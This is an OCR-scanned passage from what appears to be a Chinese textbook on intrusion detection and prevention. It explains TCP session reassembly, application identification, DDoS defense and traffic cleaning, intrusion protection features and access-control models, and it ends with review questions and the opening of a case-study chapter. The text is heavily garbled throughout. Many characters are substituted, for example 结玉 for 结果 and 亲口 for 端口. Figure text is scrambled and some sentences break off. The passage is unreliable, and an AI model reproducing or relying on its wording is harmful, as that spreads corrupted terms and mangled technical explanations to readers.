进行 草 组 ,还 原 完整 的 会 话 , 才 能 获得 更 加 精确 的 结 玉 。 丸 然 IP 数据 报 会 发 生 重 复 ,TCP 
的 接收 只 必须 丢 径 重复 的 数据 ,也 束 是 在 数据 传输 过 程 中 TCP 也 可 能 发 生 硕 序 被 打 乱 或 
者 报 文 于 失重 传 、 重 从 的 现象 。 

因此 ,入 侵 防 御 系 统 作为 部 普 在 网 络 中 的 中 间 设 备 ,为 了 能 够 对 流量 进行 入侵 分 析 ， 
必须 提供 足够 的 能 力 ,去 识别 报 文 数据 的 有 效 性 和 报 文 数据 在 原 数 据 中 的 位 置 。 从 实现 
上 ,入 侵 检 测 系统 必须 具备 类 似 TCP 接收 问 恢 复发 送 问 顺序 的 能 力 , 通 过 序列 号 对 双 问 
的 流量 进行 恢复 和 去 草 , 将 正确 的 顺序 送 给 引擎 处 理 。 入 侵 防御 系统 的 重组 步骤 如 下 。 


1 SYN 计 算 

在 TCP 建立 连接 后 ,会 为 后 续 TCP 数据 的 传输 设 定 一 个 初始 的 序列 号 。 以 后 每 传 
送 一 个 包含 有 效 数据 的 TCP 包 , 后 续 紧 接着 传送 的 一 个 TCP 数据 包 的 序列 号 都 要 做 出 
相应 的 修改 。 序 列 号 是 为 了 保证 TCP 数据 包 按 顺序 传输 ,可 以 有 效 地 实现 TCP 数据 的 
完整 传输 ,特别 是 在 数据 传送 过 程 中 出 现 错 误 的 时 候 , 可 以 有 效 地 进行 错误 修正 。 在 
TCP 会 话 的 重新 组 合 过 程 中 ,需要 按照 数据 包 的 序列 号 对 接收 到 的 数据 包 进 行 排序 。 

一 台 主 机 即将 发 出 的 报 文中 的 SEQ 值 应 等 于 它 刚 收 到 的 报 文 中 的 ACK 值 , 而 它 要 
发 送 报 文中 的 ACK 值 应 为 它 收 到 报 文 中 的 SEQ 值 加 上 该 报 文中 发 送 的 TCP 数据 的 长 
度 , 即 两 者 存在 : 

(1) 本 次 发 送 的 SEQ 二 上 次 收 到 的 ACK。 

(2) 本 次 发 送 的 ACK 王 上 次 收 到 的 SEQ 十 本 次 发 送 的 TCP 数据 长 度 。 


2 报 文 的 还 原 

以 上 讨论 的 内 容 午 是 针对 一 次 TCP 会 证 的 情况 ,但 在 实际 应 用 的 网 络 中 ,同时 传输 
的 数据 ,同时 来 日 很 多 机 兹 ,对 应 很 多 个 不 同 的 TCP 会话。 每 个 TCP 传输 的 报 文 过程 都 
有 一 个 源 .目的 MAC 地 址 、IP 地 址 和 端口 , 见 图 3-10(a)。 根 据 这 个 六 元 组 可 以 确定 唯一 
的 一 次 TCP 会 话 , 因 此 建立 一 个 链表 TCPSessionList, 每 个 节点 指 癌 一 次 TCP 会 话 组 装 
链表 TCPList, 链 表 的 表 头 即 六 元 组 ,用 于 区 分 不 同 的 TCP 会 话 。 其 中 ,mac_src 表示 源 
MAC 地 址 ;mac_dst 表示 目的 MAC 地址 ;ip_src 表示 源 IP 地 址 ;ip_dst 表示 目的 IP 地 
址 ;th_sport 表示 源 问 口 ;th_dport 表示 目的 交口 ;next 表示 一 个 指 问 下 个 TCP 会 话 市 点 
的 指针 ;tcplisthead 表示 一 个 指 问 TCPList 尖 厄 后 的 指针 。 一 个 报 文 古 点 是 一 个 四 元 
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组 , 见 图 3-10(b) ,包括 : IP 首部 标志 位 syn 和 fin, 分 别 用 来 表示 会 话 的 开始 和 结束 ;seq 
表示 数据 包 序 列 号 ;len 表示 数据 包 的 长 度 ;prev 指 加 上 一 个 TCPList 了 太 的 指针 ,前 市 
点 时 为 空 ,next 指 回 下 一 个 TCPList 廊 点 的 指针 , 尾 广 点 时 为 空 ,data 为 传输 的 TCP 数 
据 。 显 然 , 对 于 一 个 完整 的 报 文 , 重 疲 链 表 的 第 一 个 包 的 syn 为 1, 最 后 一 个 包 的 fin 为 1， 
且 所 有 节点 的 seq 应 该 是 连续 的 。 


mac STC 


next 


tcplisthead 


图 3-10 ”TCPSession 节 点 和 CPNode 节点 


数据 在 传输 过 程 中 可 能 由 于 路 由 、 数 据 校 验 错 误 等 网 络 原因 ,导致 数据 包 的 乱 序 或 重 
传 ,因此 需 建立 一 个 二 维 链表 对 众多 的 TCP 进行 管理 (二 维 链表 如 图 3-11 所 示 )。TCP 
会 话 的 重组 过 程 实 际 上 就 是 对 链表 的 插入 和 删除 的 过 程 。 针 对 每 次 TCP 会 话 建立 一 个 
TCPSession, 以 后 每 捕获 一 个 数据 包 , 首 先 检查 此 数据 包 所 属 的 TCP 会 话 是 否 已 经 在 链 
表 中 存在 ,如 果 存 在 , 则 找到 相应 的 TCP 会 话 过 程 ,根据 序列 号 将 其 插 人 到 适当 位 置 。 如 
果 所 属 的 TCP 会 话 不 在 链表 中 , 则 新 建 一 个 TCPSession 节点 并 将 其 插入 到 链表 的 尾 
部 。 在 此 过 程 中 ,如 果 一 个 数据 包 与 链表 中 某 一 个 数据 包 的 序列 号 和 数据 长 度 相 同 , 则 说 
明 是 重 发 包 , 做 丢弃 处 理 。 最 后 链表 的 每 个 数据 包 友 列 号 连续 ,日 第 一 个 数据 包 为 SYN 
包 , 最 后 一 个 数据 包 为 FIN 包 ( 或 是 连接 复位 包 RST) ,此 时 认为 报 文 是 完整 的 。 程 序 流 
程 图 如 图 3-12 所 示 。 


345 SA 应 用 识别 技术 


应 用 识别 技术 是 指 依 据 应 用 本 身 的 特征 ,将 承载 在 同一 类 型 应 用 协议 上 的 不 同 应 用 
区 分 开 。 攻 击 者 往往 会 将 攻击 信息 隐藏 在 应 用 中 ,例如 ,基于 Web 服务 需 的 安全 漏洞 和 
利用 这 些 漏 洞 的 攻击 越 来 越 多 、 越 来 越 复 杂 , 如 何 准确 地 识别 这 些 应 用 是 入侵 防御 系统 的 

传统 的 协议 识别 通常 是 通过 亲 口 识别 协议 的 ,没有 把 报 文 的 深度 内 容 检 测 及 相关 的 
协议 解析 ,检测 验证 结合 起 来 ,协议 识别 出 错 , 也 会 叶 致 攻击 行为 的 检测 率 大 大 降低 。 例 
如 ,80 并 口 是 HTTP,21 病 口 是 FTP, 但 是 协议 并 不 等 于 问 口 ,如 果 改 变 成 其 他 问 口 , 则 
会 导致 HTTP 识别 不 出 来 ,对 应 的 攻击 也 会 检测 失败 。 

SA 协议 分 析 技 术 引 入 了 基于 应 用 特征 的 次 度 识 别 , 不 是 简单 地 通过 知名 端口 定义 
协议 ,可 以 根据 协议 特征 进行 智能 识别 ,通过 高 级 的 协议 识别 技术 ,可 以 有 效 地 降低 入 侵 
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图 3-11 二 维 链表 


防御 系统 的 误 报 率 ,系统 不 会 因为 HTTP 运行 在 3128 亲口 而 湄 过 HTTP 上 的 攻击 。 网 
络 知 能 防御 系统 会 根据 威胁 检测 需要 ,支持 多 种 协议 和 文件 类 型 的 分 析 和 识别 。 

SA(Service Awareness) 技 术 以 流 为 单位 , 按 报 文 顺 序 未 个 检测 IP 报 文 载 向 内 容 , 从 
而 识别 出 流 对 应 的 协议 ,识别 后 通过 解析 内 容 的 方式 提取 更 详细 的 信息 , 即 SA 技术 包含 
SA 识别 和 SA 解析 两 种 技术 。SA 示意 图 如 图 3-13 所 示 。 

SA 识别 技术 能 够 深度 分 析 数 据 包 携带 的 L3~L77/L7 十 的 消息 内 容 、. 连 续 的 状态 / 交 
互信 息 ( 如 连接 协商 的 内 容 和 结果 状态 、 交 互信 息 的 顺序 等 ) 等 ,从 而 识别 出 详细 的 应 用 程 
序 信息 (如 协议 和 应 用 的 名 称 等 ) 。 

SA 解析 技术 是 在 SA 识别 出 报 文 协议 之 后 ,为 了 获取 更 加 详细 的 报 文 内 容 , 对 被 识 
别 的 指定 协议 的 报 文 进行 解析 ,获取 报 文 中 指定 字段 的 内 容 。 例 如 ,解析 HTTP 消息 获 
取 HTTP 访问 的 URL 等 。 


346 DDoS 防范 技术 

DDoS 是 Distributed Denial of Service 的 缩写 , 即 “ 分 布 式 拒绝 服务 >。 首先 了 解 一 下 
相关 定义 。 

服务 : 系统 提供 给 用 户 的 各 种 功能 。 

拒绝 服务 : 任何 对 服务 的 干涉 如 果 使 其 可 用 性 降低 或 者 失去 可 用 性 , 均 称 为 拒绝 
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一 一 ~ 。 读 取 数据 包 


检查 新 建立 一 个 
TCPSession List TCPSession 


| 


插入 TCPNode 到 


0 插入 到 TCPList 
TCPList 链表 相 天 、 
位置 链表 头 部 


写 人 文件 


释放 TCPList 


图 3-12 程序 流程 图 


特征 跨 多 个 报 广 


连接 状态 /交互 信息 史 


一 一 一 一 一 一 一 一 在 = i 和 一 一 一 一 
Ee 
-一 03:IPPacket L4:TCP/UDP Packet L7:Message Application/L7 i 


IP Source Dest Source Dest 和 Skype,RSTP over HTTP 
Protocol IPAddr IPAddr Port Port HTTRFTASMTFP Facebook,MSN ,.. 


3-13 SA 示意 图 


107 


入 侵 检 测 与 入 侵 防 御 


服务 。 

拒绝 服务 攻击 : 是 指 攻 击 寿 通过 条 种 手段 有 意 造 成 计算 机 或 网 络 不 能 正 第 运转 ,从 
而 不 能 向 合法 用 户 提供 需要 的 服务 或 者 使 得 服务 质量 降低 。 

分 布 式 拒绝 服务 攻击 : 处 于 不 同位 置 的 多 个 攻击 者 同时 癌 一 个 或 者 数 个 目标 发 起 攻 
击 , 或 者 一 个 或 多 个 攻击 者 控制 了 位 于 不 同位 置 的 多 台 机 带 并 利用 这 些 机 各 对 受害 者 同 
时 实施 攻击 ,由 于 攻击 的 发 出 点 分 布 在 不 同 地 方 ,因此 这 类 攻击 称 为 分 布 式 拒 绝 服 务 

DDoS 攻击 如 图 3-14 所 示 。DDoS 攻击 将 造成 网 络 贤 源 浪费 、 链 路 市 宽 培 墅 、 服 务 
亿 帝 源 耗 尽 而 使 业务 中 断 。 这 种 攻击 大 多 数 是 由 攻击 者 非法 控制 的 计算 机 实施 的 。 
攻击 者 非法 控制 一 些 计算 机 后 ,把 这 些 计 算 机 转变 为 僵尸 网 络 中 的 节点 ,然后 用 这 些 
计算 机 实施 DDoS 攻击 。 攻 击 痢 还 以 人 台 为 单位 , 低 价 出 租 这 些 用 于 攻击 的 计算 机 ,其 正 
拥有 这 些 计算 机 的 主人 并 不 知道 目 己 的 计 鼻 机 已 经 被 用 来 攻击 别人 。 由 于 可 能 会 有 


数 日 万 台 计 算 机 被 攻击 痢 变 成 攻击 蔬 扣 , 因 此 这 种 攻击 会 非常 猛烈 。 服 务 人 条 被 DDoS 
攻击 时 的 现象 如 下 : 


(1) 网 络 中 充斥 着 大 量 的 无 用 的 数据 包 。 

(2) 攻击 者 制造 高 流量 无 用 数据 ,造成 网 络 拥塞 ,使 受害 主机 无 法 正常 和 外 界 通信 。 

(3) 利用 受害 主机 提供 的 服务 或 传输 协议 上 的 缺陷 ,反复 高 速 地 发 出 特定 的 服务 请 
求 ,使 受害 主机 无 法 及 时 处 理 所 有 的 正 第 请 求 。 

(4) 严重 时 会 造成 系统 死机 。 

由 于 网 络 层 的 拒绝 服务 攻击 有 的 利用 了 网 络 协议 的 漏洞 ,有 的 则 抢占 网 络 或 者 设备 
有 限 的 处 理 能 力 , 对 拒绝 服务 攻击 的 防御 是 网 络 安全 防御 的 难题 。 尤 其 是 目前 在 大 多 数 
的 网 络 环境 骨干 线路 上 普 裔 使 用 的 防火 墙 .负载 均衡 等 设备 ,发 生 DDoS 攻击 的 时 候 往 往 
成 为 整个 网 络 的 瓶颈 ,造成 全 网 次 痪 。 

入 侵 防 御 系 统 可 以 对 DDoS 进行 流量 检测 ,在 网 络 出 现 异 第 流量 时 ,及 时 产生 告警 ， 
通知 管理 员 采 取 相 应 的 动作 保护 网 络 资源 。 


主攻 击 者 二 


黑客 跳板 主机 


~ 和 Internet 


/~ 
发 现 漏洞 -> 取得 用 户 权限 -> 取得 控 -，、 i, 下 僵尸 
制 权 -> 植 入 木马 -> 清除 痕迹 -> 留 后 _ 

门 -> 做 好 攻击 准备 


图 3-14 ” DDoS 攻击 
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人 侵 防 御 系 统 基 于 层 层 过 滤 的 异常 流量 清洗 思路 ,采用 静态 过 滤 \, 源 合法 性 认证 , 行 
为 分 析 .基于 会 话 的 防范 和 特征 识别 过 滤 5 种 技术 ,实现 对 多 种 DOS/DDoS 攻击 流量 的 
精确 清洗 。 异 常 流量 清洗 如 图 3-15 所 示 。 


_ 动态 统计 分 析 


基于 防护 对 象 的 精细 化 防范 


有 

I 
AN | 

和 1 ， 

" Zs, 源 合 ; 本 

\ 毅 i 和 : | 回 [ 
A 性 认证 
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i i -ee ». A | 下 
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有 | 

并 | 
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- 攻击 斌 量 


ss = 正 贡 流量 


基于 四 层 协 议 的 源 验 证 核心 思想 是 回访 问 防 护 目 标的 源 IP 发 送 市 有 Cookie 的 探测 
报 文 ,如 果 该 源 真 实 存在 ,就 会 对 探测 报 文 回应 , 且 回 应 报 文 携 市 Cookie。 入 侵 防 御 系 统 
通过 校 验 Cookie, 印 可 确认 该 源 IP 是 否 贞 实 人 存在。 采用 该 技术 可 以 有 效 防 御 虚 假 源 发 
起 的 SYN Flood,SYN-ACK Flood、ACK Flood 攻击 。 

对 于 基于 应 用 层 的 攻击 ,以 上 四 层 协 议 的 源 验 证 失效 ,需要 通过 深度 解码 应 用 层 协 议 
验证 源 是 否 是 应 用 的 真实 客户 端 ,如 果 是 , 则 建立 日 名 单 ,允许 其 后 续 Web 访问 流量 通 
过 ;如 采 是 僵尸 工具 发 起 的 访问 , 则 不 会 对 设备 的 反 回 探测 报 文 进行 回应 ,因此 无 法 通过 
源 验证 ,其 后 组 访问 流量 将 被 于 并 ,无 法 渗透 到 后 内 服务 大 。 对 于 利用 HTTP Proxy 发 
起 的 可 以 躲避 应 用 层 协议 源 验证 的 攻击 等 , 变 备 回 访问 源 弹 出 要 求 输入 验证 人 码 的 认证 页 
面 ,用 户 只 要 输入 正确 的 校 验 码 即 可 通过 号 份 校 验 , 继 续 访 问 。 因 验证 码 随机 变化 , 故 可 
以 有 效 防 范 绝 大 多 数 僵 尸 工具 发 起 的 攻击 。 

对 会 话 的 各 种 参数 指标 (如 时 间 、 速 率 、 状 态 等 ) 进 行 实时 监控 ,并 根据 一 些 异常 模式 
发 现 和 阻拦 淤 在 的 攻击 和 攻击 源 , 达 到 会 话 防御 的 效 末 。 同 时 ,采用 指纹 学 习 或 者 访问 频 
对 行为 学 习 防 范 该 闫 攻击。 利用 行为 分 析 可 以 有 歼 防 范 CC 攻击 和 慢 速 攻击 。 
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347 入 侵 防 护 技 术 


不 断 发 现 的 软件 漏洞 ,以 及 在 各 种 利益 驱动 下 形成 的 地 下 黑色 产业 链 ,让 网 络 随时 可 
能 遭受 到 来 日 外 部 网 络 的 各 种 攻击 。 网 络 内 部 的 P2P 下 载 、 流 媒体 、IM 即时 消息 、 网 络 
游戏 等 互联 网 应 用 不 仅 严 重 占 用 网 络 资 源 \ 降 低 企业 工作 的 效率 ,同时 也 成 为 蠕虫 病 姆 、 
木马 \ 后 门 传播 的 主要 途径 。 

为 了 确保 计算 机 网 络 安全 ,必须 建立 一 套 安 全 防护 体系 ,进行 多 层次 .多 手段 的 检测 
和 防护 。 入 侵 检 测 系统 就 是 安全 防护 体系 中 重要 的 一 环 , 它 能 够 对 4 一 7 层 的 数据 进行 深 
度 检测 ,及 时 识别 网 络 中 发 生 的 入 侵 行 为 并 实施 防护 。 

入 侵 防 护 功 能 正 是 4 一 7 层 协议 的 异 弟 特 征 检测 库 和 安全 模型 的 组 合 ,类 似 于 一 个 或 
是 否 应 该 被 阻 断 ,通过 它 能 够 主动 防御 师 虫 病毒、 木马 . 间 旋 软件 .恶意 代码 、 绥 冲 区 洲 
出 ,SQL 注入. 骏 力 猜测 .拒绝 服务 .扫描 探测 , 非 授 权 访 问 等 黑客 行为 ,并 进行 告 堵 。 

入 侵 防护 系统 对 网 络 流 量 进行 深度 、 动 态 、 和 鲁能 分 析 并 提供 防护 ,支持 精确 的 入 侵 防 
护 规 则 库 ,该 库 文 持 实时 更 新 ,以 应 对 新 兴 攻 击 或 者 攻击 变形 ,你 证 网 络 的 实时 安全 性 , 规 
则 升级 包 定 期 更 新 ,0-day 等 条 急 升级 包 会 当日 发 布 。 

同时 还 提供 了 丰 吕 的 上 网 行为 的 管理 功能 ,可 以 对 P2P 下载.IM 聊天 软件 、 在 线 视 
频 、 网 络 游戏 .炒股 软件 等 网 络 应 用 按 用 户 和 时 间 进 行 阻 断 或 宽带 限 流 ,合理 优化 网 络 流 
量 ,弥补 了 防火 场 , 入 侵 检测 等 产品 的 不 足 ,提供 动 态 、 度 .主动 的 安全 防护 。 

该 技术 主要 包含 以 下 内 容 。 


1 拦 规 外 部 网 络 的 攻击 

(1) 访问 控制 规则 :; 支持 基于 网 络 接口 IJP 地 址 .服务 .时 间 等 参数 自 定 义 访问 控制 
规则 ,以 保证 网 络 资源 不 被 非法 使 用 和 非法 访问 。 

(2) 专业 抗 DDoS: 基于 流量 自学 习 机 制 , 可 以 防范 包括 SYN Flood、UDP Flood IC- 
MP Flood 等 流量 型 攻击 和 HTTP Get .HTTP POST DNS Flood 等 应 用 型 攻击 在 内 的 
多 种 DDoS 攻击 ， 

(3) 深度 入 侵 防 护 ; 可 检测 扫描 ,缓冲 区 溢出 .SQL 注入 、XSS 跨 站 脚本 ,木马 ,蠕虫 、 
间 诬 软件 网络 钓鱼 、IP 欺骗 等 攻击 ,并 实时 主动 阻 断 ,使 网 络 系统 免 党 攻击。 

(4) 恶意 站 点 检测 ; 内 置 恶 意 站 点 库 , 包 含 挂 马 站 点 的 URL 和 挂 马 源 站 点 的 URL 
列表 ,在 终端 访问 恶意 URL 时 主动 切断 连接 。 


2 管理 内 部 网 络 的 应 用 

(1) Web 分 类 过 小 ; 防止 访问 与 工作 无 关 的 网 络 或 包含 非法 内 容 的 网 页 ,提高 工作 
效率 ,降低 病毒 进入 企业 内 网 的 概率 。 

(2) 应 用 识别 与 控制 : 提高 基于 软件 行为 和 数据 内 容 , 而 不 是 只 口 的 应 用 软件 检测 
机 制 ,可 对 聊天 软件 、.P2P 下载. 流 媒 体 在线 游 戏 、 股 票 软 件 等 进行 管控 ,以 提高 企业 的 工 
作 效 率 , 降 低 内 部 机 密 信息 泄露 及 病毒 传播 的 概率 。 
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348 应 用 管理 技术 


目前 ,虽然 部 分 应 用 可 以 通过 关闭 或 者 过 滤 闹 口 实现 阻 断 应 用 ,但 是 随 大 技术 的 进 
步 ,许多 应 用 程序 往往 都 可 以 使 用 其 他 端口 进行 通信 ,而 且 目 前 大 部 分 蠕虫 .木马 、 伪 尸 病 
毒 ,都 是 随 着 应 用 而 传播 的 。 

通过 协议 解码 器 和 应 用 识别 的 紧密 结合 ,除了 对 预定 义 的 应 用 进行 管理 外 ,还 可 以 对 
自 定 义 应 用 的 特征 进行 识别 和 管理 ,通过 用 户 自 定义 的 字段 进行 匹配 识别 和 应 用 。 

应 用 管理 功能 还 能 够 有 效 控制 IM、P2P 游戏 .商业 应 用 、 文 件 传输 等 各 种 常用 应 用 
的 使 用 ,从 应 用 层面 进行 安全 管理 ,防止 某 些 应 用 过 分 消耗 带宽 及 容易 被 漏洞 攻击 应 用 的 
小 用 等 。 

应 用 管理 对 网 络 流量 进行 深度 动态 .智能 分 析 , 文 持 精 确 的 应 用 规则 库 , 该 库 支持 实 
时 更 新 ,以 应 对 不 断 变 化 的 应 用 ,应 用 规则 升级 需要 支持 周期 性 的 更 新 。 


349 高 级 威胁 防御 技术 


网 络 攻击 者 经 党 使 用 复 洒 的 恶意 软件 危害 网 络 和 计算 机 ,以 达到 魏 取 企业 敏感 信息 
的 目的 。 数据 是 业务 的 核心 ,自然 也 就 成 了 攻击 的 核心 。2% 的 核心 数据 承载 7 70% 的 
关键 信息 ,如 客户 信息 .知识 产权 .市场 营销 计划 和 交易 信息 等 

局 级 威胁 防御 功能 对 内 网 进行 安全 的 防护 ,可 以 防止 内 网 的 敏感 信息 被 泄露 防止 菏 
些 文件 的 外 发 ,可 以 监控 服务 硕 的 非法 外 联 行为 ,可 以 防止 攻击 者 通过 服务 硕 进 行 跳 转 
攻击 。 

局 级 威胁 防 征 功能 米 用 访问 控制 数据 流 控 制 、 数 据 保护 等 技术 ,可 以 防止 内 部 的 敏 
感 数 据 ( 电 话 、 号 份 证 ,银行 卡 ) 外 泄 。 在 网 络 流 中 发 现 大 量 敏感 数据 外 传 时 ,NGIPS 会 阻 
断 外 传 行为 ,并 且 产 生 告 专 日 志 , 告 知 用 户 内 网 存在 敏感 信息 资源 外 泄 的 行为 。 

1 访问 控制 

访问 控制 是 指 系统 对 用 户 身 份 及 其 所 属 的 预先 定义 的 宋 略 组 限制 其 使 用 效 据 资 源 能 
力 的 手段 , 通 稍 用 于 系统 管理 员 探 制 用 户 对 服务 硕 、 目 录 、 文 件 等 网 络 资源 的 访问 。 访 问 
控制 是 系统 保密 性 .完整 性 .可 用 性 和 合法 使 用 性 的 重要 基础 ,是 网 络 安全 防 犯 和 资源 保 
护 的 关键 策略 之 一 ,也 是 主体 依据 某 些 控制 策略 或 权限 对 客体 本 身 或 其 资源 进行 的 不 同 
授权 访问 。 该 技术 主要 用 于 控制 用 户 能 含 进入 系统 以 及 进入 系统 的 用 户 能 够 谱写 的 数 

2 数据 流 控 制 

该 技术 和 用 户 可 以 访问 的 数据 集 的 分 砾 有 关联 ,主要 用 于 防止 数据 从 授权 的 范围 内 
扩散 到 非 授 权 的 范围 中 。 

3 数据 保护 

该 拉 术 主要 用 于 防止 数据 遭 党 到 意外 或 恶意 的 破坏 ,保证 数据 的 可 用 性 和 完整 性 。 

信息 系统 的 安全 目标 是 通过 一 组 规则 控制 和 管理 主体 对 客体 的 访问 ,这 些 访问 控制 
规则 称 为 安全 策略 。 安 全 策略 反映 信息 系统 对 安全 的 需求 。 安 全 模型 是 制定 安全 策略 的 
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依据 , 它 用 形式 化 的 方法 准确 地 描述 安全 的 重要 方面 (机 密 性 .完整 性 和 可 用 性 ) 及 其 与 系 
统 行为 的 关系 。 建 立 安 全 模型 的 主要 目的 是 提高 对 成 功 实现 关键 安全 需求 的 理解 层次 ， 
以 及 为 机 密 性 和 完整 性 寻找 安全 策略 。 安 全 模型 是 构建 系统 保护 的 重要 依据 ,同时 也 是 
建立 和 评估 安全 操作 系统 的 重要 依据 。 

访问 控制 模型 可 以 从 访问 控制 的 角度 描述 安全 系统 ,主要 针对 系统 中 主体 对 客体 的 
访问 及 其 安全 控制 。 访 问 控制 安全 模型 中 一 般 包含 主体 .客体 ,以 及 识别 和 验证 这 些 实体 
的 子 系统 及 控制 实体 间 访 问 的 参考 监视 占 。 通 常 ,访问 控制 分 为 自主 访问 控制 (DAC) 和 
强制 访问 控制 (MAC)。DAC 机 制 允 许 对 象 的 属 主 制定 针对 该 对 象 的 保护 策略 。 通 常 ， 
DAC 通过 授权 列表 或 访问 控制 列表 (ACL) 限 定 哪些 主体 针对 哪些 客体 可 以 执行 什么 操 
作 。 如 此 可 以 非常 灵活 地 对 策略 进行 调整 。 由 于 其 易 用 性 和 可 扩展 性 ,自主 访问 控制 机 
制 经 党 被 用 于 商业 系统 。MAC 用 来 保护 系统 确定 的 对 象 ,对 此 对 和 象 用 户 不 能 进行 更 改 。 
这 样 的 访问 控制 规则 通常 对 数据 和 用 户 按照 安全 等 级 划分 标签 ,访问 控制 机 制 通过 比较 
安全 标签 确定 是 授予 ,还 是 拒绝 用 户 对 资源 的 访问 。 强 制 访问 控制 进行 了 很 强 的 等 级 划 
分 ,所 以 经 第 用 于 军事 领域 。 

文件 识别 可 以 防止 内 部 特定 格式 的 文件 的 外 发 。 例 如 ,在 专利 部 门 中 ,为 了 防止 专利 
文档 被 恶意 获取 并 且 传 送 到 外 部 网 络 , 需 要 监控 PDF 格式 或 者 图 片 格式 文件 的 外 发 。 

文件 识别 和 文件 保护 主要 通过 采取 访问 控制 与 授权 的 方式 进行 保护 ,授权 行为 是 指 
主体 履行 被 客体 授予 权力 的 那些 活动 。 因 此 ,访问 控制 与 授权 密 不 可 分 。 授 权 表 示 一 种 
信任 关系 ,一 般 这 种 信任 关系 需要 建立 一 种 模型 对 其 进行 描述 ,这 样 才能 保证 授权 的 正确 
性 ,特别 是 在 大 型 系统 中 的 授权 ,如 果 没 有 信任 关系 模型 进行 指导 , 想 保证 合理 的 授权 行 
为 几乎 是 无 法 实现 的 。 例 如 ,在 SecIPS 3600 产品 中 ,服务 器 的 用 户 管理 ,文档 流转 等 模 
块 ,就 是 建立 在 信任 模型 的 基础 之 上 研发 的 ,从 而 能 够 保证 在 复杂 的 系统 中 ,文档 能 够 被 
正确 地 流转 和 使 用 。 
服务 兰 异 第 防护 监控 服务 需 的 非法 外 联 行为 ( 除 服务 融合 法 外 联 以 外 的 所 有 外 联 行 
;进而 协助 网 管 排查 是 否 有 跳 转 等 攻击 行为 。 


3.5 思考 题 


为 


Te 


. 侧 述 入侵 防御 模型 。 

. 人 侵 防御 系统 主要 包括 哪些 技术 于 段 ? 
. 基于 主机 的 入 侵 防 御 系 统 有 哪些 优点 ? 
. 基于 网 络 的 入 侵 防御 系统 有 哪些 优点 ? 
. 应 用 和 人 侵 防御 系统 有 哪些 技术 优势 ? 

. 入 侵 检 测 写 入 侵 防 御 的 区 别 是 什么 ? 

. 入 侵 防 御 系 统 主要 有 哪些 分 类 ? 

. 和信 侵 防御 系统 的 主要 功能 是 什么 ? 

. 入 侵 防御 系统 淋 构 中 主要 包括 哪些 模块 ? 
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. 人 和信 侵 防御 系统 有 哪些 主要 特点 ? 

1. 基于 统计 和 识别 网 络 寞 第 流量 的 技术 手段 有 哪些 ? 
. 列举 几 种 人 侵 防御 系统 的 关键 扩 术 。 

. 何 述 IP 分 片 重组 技术 的 基本 原理 。 

. 简 述 入 侵 防御 系统 的 重组 步 缀 。 

.向 述 SA 应 用 识别 技术 和 传统 协议 识别 的 区 别 。 
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4 辣 
帘 4 而 各 型 案例 


4.1 ”企业 网 络 入 侵 检 测 解 决 万 双 


411 应 用 育 景 及 需求 分 析 


1 应 用 背 丸 

随 看 互联 网 的 发 展 ,网 络 变 得 越 来 越 复 洒 ,也 越 来 越 难以 你 证 安全 。 为 了 共享 信息 ， 
实现 流水 线 操 作 ,各 公司 还 将 他 们 的 网 络 回 商业 伙伴 、 供 应 商 及 其 他 外 部 人 员 开 放 , 这 些 
开放 式 网 络 比 原来 的 网 络 更 匈 遭 到 攻击 。 此 外 ,他 们 还 将 内 部 网 络 连接 到 互联 网 (Tnter- 
net) , 想 从 Internet 的 分 类 服务 及 广泛 的 信息 中 得 到 收益 ,以 满足 重要 的 商业 目的 ,包括 : 

(1) 让 员工 访问 Internet 资源 。 员 工 利 用 Internet 中 大 量 的 信息 和 设施 提高 他 们 的 
工作 效率 。 

(2) 人 允许 外 部 用 户 通过 Internet 访问 内 部 网 。 企 业 需 要 回 外 部 用 户 公 开 内 部 网 络 信 
县 ,包括 客户 、 提 供 商 和 商业 伙伴 。 

(3) 将 Internet 作为 商务 基础 。Internet 最 吸引 人 的 一 个 地 方 在 于 ,与 常规 商业 媒介 
相 比 , 它 能 使 各 公司 接触 到 的 客户 范围 更 三 ,数量 更 多 ， 

虽然 连 人 Internet 有 众多 好 处 ,但 它 将 内 部 网 络 骏 露 给 数 以 自 万 计 的 外 部 人 员 ,大 大 
增加 了 有 效 维护 网 络 安全 的 难度 。 为 此 ,技术 提供 商 提出 了 多 种 安全 解决 方案 ,以 帮助 各 
公司 的 内 部 网 免 午 外 部 攻击 ,这些 措施 包括 防火 场 .操作 系统 安全 机 制 ( 如 刁 份 确认 和 访 
问 权 限 等 级 ) 及 加 密 。 但 即使 采用 各 种 安全 解决 方案 ,黑客 也 总 能 设法 攻破 防线 ,而 且 网 
络 为 了 适应 不 断 变 化 的 商业 环境 (如 重组 、 痰 并 合并 等 ) ,不 得 不 经 党 改动 ,这 就 使 和 有效 维 
护 安 全 措施 这 一 问题 更 加 复 灯 。 

近年 来 ,全 球 重 大 安全 事件 频 发 ,2013 年 曝光 的 “ 校 镜 门 ”事件 “RSA 后 门 ” 事 件 、 
2017 年 爆发 的 新 型 “蠕虫 式 ” 勒 守 软件 WannaCry 等 更 是 引起 各 界 对 信息 安全 的 厂 沁 关 
注 。 网 络 攻 击 从 最 初 的 月 发 式 、 分 散 式 的 攻击 转 回 专业 化 的 有 组 织 行为 ,呈现 出 攻击 工具 
专业 化 .目的 商业 化 .行为 组 织 化 的 特点 。 随 看 获 利 成 为 网 络 攻击 活动 的 核心 ,许多 信息 
网 络 漏洞 和 攻击 工具 被 不 法 分 子 和 组 织 商 品 化 ,以 此 牟取 暴利 ,从 而 使 信息 安全 威胁 的 范 
围 加 速 扩散 。 个 人 信息 及 敏感 信息 泄露 的 信息 安全 事件 ,可 能 引发 严重 的 网 络 诈骗 .电信 
诈骗 ,财务 蒜 系 年 犯罪 案件 ,并 最 终 导 致 严重 的 经 济 损失 ;政府 机 构 、 工 业 控 制 系统 \、 互 联 
网 服务 硕 遭 受 攻 击破 坏 、 发 生 重 大 安全 事件 ,将 导致 能 源 、 交 通 . 通 信和 金融 等 基础 设施 次 
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痪 ,造成 灾难 性 后 果 ,严重 危害 国家 经 济 安全 和 公共 利益 。 全 球 整体 网 络 安全 形势 不 容 乐 
观 ,国际 则 网 络 空间 苋 争 形 努 日 益 紧 张 。 

面 对 日 益 产 峻 的 网 络 空间 安全 威胁 ,美国 德国. 闫 国法 国 等 世界 主要 发 达 国 家 纷纷 
出 台 了 国家 网 络 安 全 战略 ,明确 网 络 空间 战略 地 位 ,并 提出 将 采取 包括 外 交 、 和 军事 \ 经 济 等 
在 内 的 多 种 手段 保障 网 络 空间 安全 。2011 年 4 月 ,美国 发 布 了 《网 络 空间 可 信和 身份 国家 
